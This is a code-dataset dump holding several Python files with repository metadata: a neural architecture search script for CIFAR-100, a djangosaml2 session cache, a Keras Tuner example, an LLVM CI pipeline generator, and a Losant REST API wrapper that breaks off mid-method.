parser.add_argument('--invth', type=float, default=0.65,
                    help="inversion threshold of prototype norm")
parser.add_argument('--protolimit', type=int, default=10,
help="limit on the inversion count before terminating")
parser.add_argument('--gpus', type=int, default=4,
help="number of GPU devices to use")
parser.add_argument('--netcount', type=int, default=250,
help="networks to sample per GPU")
parser.add_argument('--workers', type=int, default=8,
help="number of data loading CPU workers per GPU")
parser.add_argument('--resume', type=int, default=-1,
help="from which iteration to continue, omit to start from scratch")
args = parser.parse_args()
cifarpath = args.cifarpath
init_path = args.init
out_prefix = args.out
gpu_count = args.gpus
netcount = args.netcount
big_iterations = args.iter
shortcut = 'none'
shortcut_value = 2
if args.dense:
shortcut = 'dense'
shortcut_value = args.dense
if args.residual:
shortcut = 'residual'
shortcut_value = args.residual
prob_bound = args.bound
invert_threshold = args.invth
protolimit = args.protolimit
inv_counter = 0
base_lr = 0.01
momentum = 0.9
workers = args.workers
epochs = 20
batch_size = 128
class_count = 100
top_slice = 100
cudnn.benchmark = False
resume = args.resume
normalize = transforms.Normalize(mean=[0.491, 0.482, 0.447],
std=[0.247, 0.243, 0.262])
train_dataset = datasets.CIFAR100(cifarpath, train=True,
transform=transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize]))
test_dataset = datasets.CIFAR100(cifarpath, train=False,
transform=transforms.Compose([
transforms.ToTensor(),
normalize]))
def adjust_learning_rate(optimizer, epoch, lr):
lr = lr * (0.1 ** (epoch // 10))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
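# Worked example: with base_lr = 0.01 and epochs = 20, the step decay above
# yields lr = 0.01 for epochs 0-9 and lr = 0.001 for epochs 10-19.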
def get_layer_schedule(iteration):
if iteration<2:
return 2
else:
return 1
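# i.e. the prototype grows by two layers in each of the first two generations
# and by one layer per generation after that (see the np.vstack call below).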
opLibrary = ased.get_default_library()
def gpu_proc(gpu_id, it, prototype, netcount, train_idx, val_idx, seed):
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
fname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(gpu_id)+".pickle"
store = Astore()
for p in pars:
store[p] = []
np.random.seed(seed+gpu_id)
torch.manual_seed(seed+gpu_id)
torch.cuda.set_device(gpu_id)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(train_idx),
num_workers=workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(val_idx),
num_workers=workers, pin_memory=True)
for n in range(netcount):
if n % 50 == 0:
print("GPU "+str(gpu_id)+" processed "+str(n)+" networks")
net = ased.generate_shortcut_feature_network(3, 32, 32, prototype,
opLibrary,
shortcuts=shortcut,
skip_value=shortcut_value)
store['phenotypes'].append(ased.network_to_phenotype(net))
evnet = ased.EvalNet2(net, class_count).cuda()
crit = nn.CrossEntropyLoss().cuda()
lr = base_lr
optim = torch.optim.SGD(evnet.parameters(), lr,
momentum=momentum)
start = time.time()
for epoch in range(0, epochs):
lr = adjust_learning_rate(optim, epoch, lr)
utorch.train1epoch(train_loader, evnet, crit, optim, epoch,
verbose=False)
store['runtime'].append(time.time()-start)
acc, loss, cfmat = utorch.validate_cfmat(val_loader, evnet, crit,
class_count, verbose=False)
store['loss'].append(loss)
store['cfmat'].append(cfmat)
store['matthews'].append(ased_util.multiclass_matthews(cfmat))
store['perf'].append(acc)
store['params'].append(utorch.count_parameters(evnet))
store.dump(fname)
del evnet
del crit
del optim
store.dump(fname)
print("GPU "+str(gpu_id)+" finished generation "+str(it))
if __name__ == '__main__':
base_seed = 3051991
np.random.seed(base_seed)
torch.manual_seed(base_seed)
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
mainstore = Astore()
splitter = StratifiedShuffleSplit(n_splits=big_iterations, test_size=0.2)
tr = splitter.split(np.zeros((50000,1)), train_dataset.targets)
if resume == -1:
init_store = Astore()
init_store.load(init_path)
topnets = np.argsort(init_store['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(init_store['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
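# The prototype is the element-wise mean of the binary encodings of the
# top-100 networks ranked by Matthews score; each row is (presumably) the
# empirical op-selection distribution for one layer.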
del init_store
else:
print("Resuming the process from iteration "+str(resume))
sname = "./data/"+out_prefix+"_iter"+str(resume)+"_cumul.pickle"
mainstore.load(sname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
for it in np.arange(resume+1,big_iterations):
print("Starting evo generation "+str(it))
fname = "./data/"+out_prefix+"_iter"+str(it)+"_cumul.pickle"
for p in pars:
mainstore[p] = []
if np.linalg.norm(prototype,axis=1).mean() > invert_threshold:
print("Inversion threshold reached, prototype modified")
if inv_counter == protolimit:
print("Prototype limit reached, stopping the search")
sys.exit(0)
inv_counter+=1
prototype = ased.invert_prototype(prototype, len(opLibrary),
prob_bound)
add_layer = get_layer_schedule(it)
prototype = np.vstack([prototype,
ased.get_uniform_prototype(add_layer, opLibrary)])
train_idx, val_idx = next(tr)
processes = []
for r in range(gpu_count):
p = mp.Process(target=gpu_proc, args=(r,it, prototype, netcount,
train_idx, val_idx, base_seed))
p.start()
processes.append(p)
for p in processes:
p.join()
smallstore = Astore()
for r in range(gpu_count):
sname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(r)+".pickle"
smallstore.load(sname)
for v in pars:
mainstore[v].extend(smallstore[v])
mainstore.dump(fname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
| 39.384615
| 91
| 0.604601
|
import utorch
import ased
import ased_util
import sys
import time
import numpy as np
from astore import Astore
from sklearn.model_selection import StratifiedShuffleSplit
import argparse
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
parser = argparse.ArgumentParser(description="Run the ASED search with the given settings")
parse_group = parser.add_mutually_exclusive_group()
parser.add_argument('--cifarpath', required=True, help="path to CIFAR100 dataset")
parser.add_argument('--init', required=True, help="path to init file, including filename")
parser.add_argument('--out', required=True, help="prefix for output files")
parse_group.add_argument('--dense', type=int,
help="enable dense shortcut pattern with given value")
parse_group.add_argument('--residual', type=int,
help="enable residual shortcut pattern with given value")
parser.add_argument('--iter', type=int, default=9,
help="number of search iterations to run")
parser.add_argument('--bound', type=float, default=0.9,
help="the upper bound for probability")
parser.add_argument('--invth', type=float, default=0.65,
                    help="inversion threshold of prototype norm")
parser.add_argument('--protolimit', type=int, default=10,
help="limit on the inversion count before terminating")
parser.add_argument('--gpus', type=int, default=4,
help="number of GPU devices to use")
parser.add_argument('--netcount', type=int, default=250,
help="networks to sample per GPU")
parser.add_argument('--workers', type=int, default=8,
help="number of data loading CPU workers per GPU")
parser.add_argument('--resume', type=int, default=-1,
help="from which iteration to continue, omit to start from scratch")
args = parser.parse_args()
cifarpath = args.cifarpath
init_path = args.init
out_prefix = args.out
gpu_count = args.gpus
netcount = args.netcount
big_iterations = args.iter
shortcut = 'none'
shortcut_value = 2
if args.dense:
shortcut = 'dense'
shortcut_value = args.dense
if args.residual:
shortcut = 'residual'
shortcut_value = args.residual
prob_bound = args.bound
invert_threshold = args.invth
protolimit = args.protolimit
inv_counter = 0
base_lr = 0.01
momentum = 0.9
workers = args.workers
epochs = 20
batch_size = 128
class_count = 100
top_slice = 100
cudnn.benchmark = False
resume = args.resume
normalize = transforms.Normalize(mean=[0.491, 0.482, 0.447],
std=[0.247, 0.243, 0.262])
train_dataset = datasets.CIFAR100(cifarpath, train=True,
transform=transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize]))
test_dataset = datasets.CIFAR100(cifarpath, train=False,
transform=transforms.Compose([
transforms.ToTensor(),
normalize]))
def adjust_learning_rate(optimizer, epoch, lr):
lr = lr * (0.1 ** (epoch // 10))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def get_layer_schedule(iteration):
if iteration<2:
return 2
else:
return 1
opLibrary = ased.get_default_library()
def gpu_proc(gpu_id, it, prototype, netcount, train_idx, val_idx, seed):
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
fname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(gpu_id)+".pickle"
store = Astore()
for p in pars:
store[p] = []
np.random.seed(seed+gpu_id)
torch.manual_seed(seed+gpu_id)
torch.cuda.set_device(gpu_id)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(train_idx),
num_workers=workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(val_idx),
num_workers=workers, pin_memory=True)
for n in range(netcount):
if n % 50 == 0:
print("GPU "+str(gpu_id)+" processed "+str(n)+" networks")
net = ased.generate_shortcut_feature_network(3, 32, 32, prototype,
opLibrary,
shortcuts=shortcut,
skip_value=shortcut_value)
store['phenotypes'].append(ased.network_to_phenotype(net))
evnet = ased.EvalNet2(net, class_count).cuda()
crit = nn.CrossEntropyLoss().cuda()
lr = base_lr
optim = torch.optim.SGD(evnet.parameters(), lr,
momentum=momentum)
start = time.time()
for epoch in range(0, epochs):
lr = adjust_learning_rate(optim, epoch, lr)
utorch.train1epoch(train_loader, evnet, crit, optim, epoch,
verbose=False)
store['runtime'].append(time.time()-start)
acc, loss, cfmat = utorch.validate_cfmat(val_loader, evnet, crit,
class_count, verbose=False)
store['loss'].append(loss)
store['cfmat'].append(cfmat)
store['matthews'].append(ased_util.multiclass_matthews(cfmat))
store['perf'].append(acc)
store['params'].append(utorch.count_parameters(evnet))
store.dump(fname)
del evnet
del crit
del optim
store.dump(fname)
print("GPU "+str(gpu_id)+" finished generation "+str(it))
if __name__ == '__main__':
base_seed = 3051991
np.random.seed(base_seed)
torch.manual_seed(base_seed)
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
mainstore = Astore()
splitter = StratifiedShuffleSplit(n_splits=big_iterations, test_size=0.2)
tr = splitter.split(np.zeros((50000,1)), train_dataset.targets)
if resume == -1:
init_store = Astore()
init_store.load(init_path)
topnets = np.argsort(init_store['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(init_store['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
del init_store
else:
print("Resuming the process from iteration "+str(resume))
sname = "./data/"+out_prefix+"_iter"+str(resume)+"_cumul.pickle"
mainstore.load(sname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
for it in np.arange(resume+1,big_iterations):
print("Starting evo generation "+str(it))
fname = "./data/"+out_prefix+"_iter"+str(it)+"_cumul.pickle"
for p in pars:
mainstore[p] = []
if np.linalg.norm(prototype,axis=1).mean() > invert_threshold:
print("Inversion threshold reached, prototype modified")
if inv_counter == protolimit:
print("Prototype limit reached, stopping the search")
sys.exit(0)
inv_counter+=1
prototype = ased.invert_prototype(prototype, len(opLibrary),
prob_bound)
add_layer = get_layer_schedule(it)
prototype = np.vstack([prototype,
ased.get_uniform_prototype(add_layer, opLibrary)])
train_idx, val_idx = next(tr)
processes = []
for r in range(gpu_count):
p = mp.Process(target=gpu_proc, args=(r,it, prototype, netcount,
train_idx, val_idx, base_seed))
p.start()
processes.append(p)
for p in processes:
p.join()
smallstore = Astore()
for r in range(gpu_count):
sname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(r)+".pickle"
smallstore.load(sname)
for v in pars:
mainstore[v].extend(smallstore[v])
mainstore.dump(fname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
| true
| true
|
1c40b93725b4401b90eeef6d41c467d228a3c3e7
| 21
|
py
|
Python
|
damCalculator/force/__init__.py
|
YingnanXuUCB/damCalculator
|
c2c7d1b57d87033f41e24fad1cececd96ec7c388
|
[
"MIT"
] | null | null | null |
damCalculator/force/__init__.py
|
YingnanXuUCB/damCalculator
|
c2c7d1b57d87033f41e24fad1cececd96ec7c388
|
[
"MIT"
] | null | null | null |
damCalculator/force/__init__.py
|
YingnanXuUCB/damCalculator
|
c2c7d1b57d87033f41e24fad1cececd96ec7c388
|
[
"MIT"
] | null | null | null |
from .forces import *
| 21
| 21
| 0.761905
|
from .forces import *
| true
| true
|
1c40b967e9798ce772656204f94ecfee89c38b0e
| 2,947
|
py
|
Python
|
djangosaml2/cache.py
|
chander/djangosaml2
|
edeef7e529769e5f7f99801a6a78c53ea7067198
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
djangosaml2/cache.py
|
chander/djangosaml2
|
edeef7e529769e5f7f99801a6a78c53ea7067198
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
djangosaml2/cache.py
|
chander/djangosaml2
|
edeef7e529769e5f7f99801a6a78c53ea7067198
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
# Copyright (C) 2011-2012 Yaco Sistemas (http://www.yaco.es)
# Copyright (C) 2010 Lorenzo Gil Sanchez <lorenzo.gil.sanchez@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from saml2.cache import Cache
class DjangoSessionCacheAdapter(dict):
"""A cache of things that are stored in the Django Session"""
key_prefix = '_saml2'
def __init__(self, django_session, key_suffix):
self.session = django_session
self.key = self.key_prefix + key_suffix
super(DjangoSessionCacheAdapter, self).__init__(self._get_objects())
def _get_objects(self):
return self.session.get(self.key, {})
def _set_objects(self, objects):
self.session[self.key] = objects
def sync(self):
# Changes in inner objects do not cause session invalidation
# https://docs.djangoproject.com/en/1.9/topics/http/sessions/#when-sessions-are-saved
#add objects to session
self._set_objects(dict(self))
#invalidate session
self.session.modified = True
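# Minimal usage sketch (hypothetical key suffix) showing why sync() exists:
#
#   adapter = DjangoSessionCacheAdapter(request.session, '_demo')
#   adapter['k'] = 'v'   # mutating the dict alone is invisible to Django
#   adapter.sync()       # writes back and flags the session as modified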
class OutstandingQueriesCache(object):
"""Handles the queries that have been sent to the IdP and have not
been replied yet.
"""
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session,
'_outstanding_queries')
def outstanding_queries(self):
return self._db._get_objects()
def set(self, saml2_session_id, came_from):
self._db[saml2_session_id] = came_from
self._db.sync()
def delete(self, saml2_session_id):
if saml2_session_id in self._db:
del self._db[saml2_session_id]
self._db.sync()
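# Life-cycle sketch (hypothetical ids) for the class above:
#
#   cache = OutstandingQueriesCache(request.session)
#   cache.set('id-1234', '/next')    # remember where the user came from
#   cache.outstanding_queries()      # -> {'id-1234': '/next'}
#   cache.delete('id-1234')          # drop it once the IdP has replied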
class IdentityCache(Cache):
"""Handles information about the users that have been succesfully
logged in.
This information is useful because when the user logs out we must
know where does he come from in order to notify such IdP/AA.
The current implementation stores this information in the Django session.
"""
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session, '_identities')
self._sync = True
class StateCache(DjangoSessionCacheAdapter):
"""Store state information that is needed to associate a logout
request with its response.
"""
def __init__(self, django_session):
super(StateCache, self).__init__(django_session, '_state')
| 32.744444
| 93
| 0.695283
|
from saml2.cache import Cache
class DjangoSessionCacheAdapter(dict):
key_prefix = '_saml2'
def __init__(self, django_session, key_suffix):
self.session = django_session
self.key = self.key_prefix + key_suffix
super(DjangoSessionCacheAdapter, self).__init__(self._get_objects())
def _get_objects(self):
return self.session.get(self.key, {})
def _set_objects(self, objects):
self.session[self.key] = objects
def sync(self):
        self._set_objects(dict(self))
self.session.modified = True
class OutstandingQueriesCache(object):
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session,
'_outstanding_queries')
def outstanding_queries(self):
return self._db._get_objects()
def set(self, saml2_session_id, came_from):
self._db[saml2_session_id] = came_from
self._db.sync()
def delete(self, saml2_session_id):
if saml2_session_id in self._db:
del self._db[saml2_session_id]
self._db.sync()
class IdentityCache(Cache):
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session, '_identities')
self._sync = True
class StateCache(DjangoSessionCacheAdapter):
def __init__(self, django_session):
super(StateCache, self).__init__(django_session, '_state')
| true
| true
|
1c40b99599236f6163dc5f14cd48f334f09c239c
| 1,891
|
py
|
Python
|
tutorials/tunable_xception_cifar10/tunable_xception_cifar10.py
|
Gonaz/keras-tuner
|
f8264811d4744abb4f0fdab480e8a4e6ddf91c4e
|
[
"Apache-2.0"
] | 1
|
2020-11-08T17:04:21.000Z
|
2020-11-08T17:04:21.000Z
|
tutorials/tunable_xception_cifar10/tunable_xception_cifar10.py
|
Gonaz/keras-tuner
|
f8264811d4744abb4f0fdab480e8a4e6ddf91c4e
|
[
"Apache-2.0"
] | null | null | null |
tutorials/tunable_xception_cifar10/tunable_xception_cifar10.py
|
Gonaz/keras-tuner
|
f8264811d4744abb4f0fdab480e8a4e6ddf91c4e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The Keras Tuner Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example on how to use Tunable Xception."""
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.datasets import cifar10
from kerastuner.applications import HyperXception
from kerastuner import RandomSearch
# Load the CIFAR10 dataset.
NUM_CLASSES = 10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = to_categorical(y_train, NUM_CLASSES)
y_test = to_categorical(y_test, NUM_CLASSES)
# Import a hypertunable version of Xception.
hypermodel = HyperXception(
input_shape=x_train.shape[1:],
classes=NUM_CLASSES)
# Initialize the hypertuner: we should find the model that maximizes the
# validation accuracy, using 40 trials in total.
tuner = RandomSearch(
hypermodel,
objective='val_accuracy',
max_trials=40,
project_name='cifar10_xception',
directory='test_directory')
# Display search overview.
tuner.search_space_summary()
# Performs the hypertuning.
tuner.search(x_train, y_train, epochs=10, validation_split=0.1)
# Show the best models, their hyperparameters, and the resulting metrics.
tuner.results_summary()
# Retrieve the best model.
best_model = tuner.get_best_models(num_models=1)[0]
# Evaluate the best model.
loss, accuracy = best_model.evaluate(x_test, y_test)
print('loss:', loss)
print('accuracy:', accuracy)
| 32.603448
| 74
| 0.773665
|
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.datasets import cifar10
from kerastuner.applications import HyperXception
from kerastuner import RandomSearch
NUM_CLASSES = 10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = to_categorical(y_train, NUM_CLASSES)
y_test = to_categorical(y_test, NUM_CLASSES)
hypermodel = HyperXception(
input_shape=x_train.shape[1:],
classes=NUM_CLASSES)
tuner = RandomSearch(
hypermodel,
objective='val_accuracy',
max_trials=40,
project_name='cifar10_xception',
directory='test_directory')
tuner.search_space_summary()
tuner.search(x_train, y_train, epochs=10, validation_split=0.1)
tuner.results_summary()
best_model = tuner.get_best_models(num_models=1)[0]
loss, accuracy = best_model.evaluate(x_test, y_test)
print('loss:', loss)
print('accuracy:', accuracy)
| true
| true
|
1c40b9c3406064309f1ba271b8940f616aec18fa
| 1,936
|
py
|
Python
|
scripts/pipeline_main.py
|
rnk/llvm-premerge-checks
|
859df4066fc06d9151e22530fce3309174cb5470
|
[
"Apache-2.0"
] | null | null | null |
scripts/pipeline_main.py
|
rnk/llvm-premerge-checks
|
859df4066fc06d9151e22530fce3309174cb5470
|
[
"Apache-2.0"
] | null | null | null |
scripts/pipeline_main.py
|
rnk/llvm-premerge-checks
|
859df4066fc06d9151e22530fce3309174cb5470
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License v2.0 with LLVM Exceptions (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://llvm.org/LICENSE.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from steps import generic_linux, generic_windows, from_shell_output
import yaml
steps_generators = [
'${BUILDKITE_BUILD_CHECKOUT_PATH}/libcxx/utils/ci/buildkite-pipeline-snapshot.sh',
]
if __name__ == '__main__':
scripts_refspec = os.getenv("ph_scripts_refspec", "main")
no_cache = os.getenv('ph_no_cache') is not None
projects = os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly')
log_level = os.getenv('ph_log_level', 'WARNING')
notify_emails = list(filter(None, os.getenv('ph_notify_emails', '').split(',')))
steps = []
steps.extend(generic_linux(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly'),
False))
# FIXME: openmp is removed as it constantly fails.
# TODO: Make this project list be evaluated through "choose_projects" (as now we define "all" and exclusions in
# two places).
steps.extend(generic_windows(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;polly')))
for gen in steps_generators:
steps.extend(from_shell_output(gen))
notify = []
for e in notify_emails:
notify.append({'email': e})
print(yaml.dump({'steps': steps, 'notify': notify}))
| 39.510204
| 120
| 0.722107
|
import os
from steps import generic_linux, generic_windows, from_shell_output
import yaml
steps_generators = [
'${BUILDKITE_BUILD_CHECKOUT_PATH}/libcxx/utils/ci/buildkite-pipeline-snapshot.sh',
]
if __name__ == '__main__':
scripts_refspec = os.getenv("ph_scripts_refspec", "main")
no_cache = os.getenv('ph_no_cache') is not None
projects = os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly')
log_level = os.getenv('ph_log_level', 'WARNING')
notify_emails = list(filter(None, os.getenv('ph_notify_emails', '').split(',')))
steps = []
steps.extend(generic_linux(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly'),
False))
steps.extend(generic_windows(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;polly')))
for gen in steps_generators:
steps.extend(from_shell_output(gen))
notify = []
for e in notify_emails:
notify.append({'email': e})
print(yaml.dump({'steps': steps, 'notify': notify}))
| true
| true
|
1c40b9fa431618695234cae3495c1fe3816040dd
| 7,589
|
py
|
Python
|
losantrest/instance_member.py
|
Losant/losant-rest-python
|
50a6ce13dfef7acefb930fe45893c7bae862f784
|
[
"MIT"
] | 5
|
2016-06-16T20:18:11.000Z
|
2022-03-09T11:41:59.000Z
|
losantrest/instance_member.py
|
Losant/losant-rest-python
|
50a6ce13dfef7acefb930fe45893c7bae862f784
|
[
"MIT"
] | 4
|
2021-07-13T06:09:16.000Z
|
2022-03-07T14:24:49.000Z
|
losantrest/instance_member.py
|
Losant/losant-rest-python
|
50a6ce13dfef7acefb930fe45893c7bae862f784
|
[
"MIT"
] | 6
|
2016-11-18T03:19:17.000Z
|
2022-03-09T11:41:47.000Z
|
"""
The MIT License (MIT)
Copyright (c) 2021 Losant IoT, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
""" Module for Losant API InstanceMember wrapper class """
import json
# pylint: disable=C0301
class InstanceMember(object):
""" Class containing all the actions for the Instance Member Resource """
def __init__(self, client):
self.client = client
def delete(self, **kwargs):
"""
Deletes an instance member
Authentication:
The client must be configured with a valid api
access token to call this action. The token
must include at least one of the following scopes:
all.Instance, all.User, instanceMember.*, or instanceMember.delete.
Parameters:
* {string} instanceId - ID associated with the instance
* {string} userId - ID associated with the instance member
* {string} losantdomain - Domain scope of request (rarely needed)
* {boolean} _actions - Return resource actions in response
* {boolean} _links - Return resource link in response
* {boolean} _embedded - Return embedded resources in response
Responses:
* 200 - If member was successfully deleted (https://api.losant.com/#/definitions/success)
Errors:
* 400 - Error if malformed request (https://api.losant.com/#/definitions/error)
* 404 - Error if instance or member was not found (https://api.losant.com/#/definitions/error)
"""
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("DELETE", path, params=query_params, headers=headers, body=body)
def get(self, **kwargs):
"""
Returns an instance member
Authentication:
The client must be configured with a valid api
access token to call this action. The token
must include at least one of the following scopes:
all.Instance, all.Instance.read, all.User, all.User.read, instanceMember.*, or instanceMember.get.
Parameters:
* {string} instanceId - ID associated with the instance
* {string} userId - ID associated with the instance member
* {string} losantdomain - Domain scope of request (rarely needed)
* {boolean} _actions - Return resource actions in response
* {boolean} _links - Return resource link in response
* {boolean} _embedded - Return embedded resources in response
Responses:
* 200 - A single instance member (https://api.losant.com/#/definitions/instanceMember)
Errors:
* 400 - Error if malformed request (https://api.losant.com/#/definitions/error)
* 404 - Error if instance or member was not found (https://api.losant.com/#/definitions/error)
"""
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("GET", path, params=query_params, headers=headers, body=body)
def patch(self, **kwargs):
"""
Modifies the role of an instance member
Authentication:
The client must be configured with a valid api
access token to call this action. The token
must include at least one of the following scopes:
all.Instance, all.User, instanceMember.*, or instanceMember.patch.
Parameters:
* {string} instanceId - ID associated with the instance
* {string} userId - ID associated with the instance member
* {hash} member - Object containing new member info (https://api.losant.com/#/definitions/instanceMemberPatch)
* {string} losantdomain - Domain scope of request (rarely needed)
* {boolean} _actions - Return resource actions in response
* {boolean} _links - Return resource link in response
* {boolean} _embedded - Return embedded resources in response
Responses:
* 200 - The modified instance member (https://api.losant.com/#/definitions/instanceMemberPatch)
Errors:
* 400 - Error if malformed request (https://api.losant.com/#/definitions/error)
* 404 - Error if instance or member was not found (https://api.losant.com/#/definitions/error)
"""
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "member" in kwargs:
body = kwargs["member"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
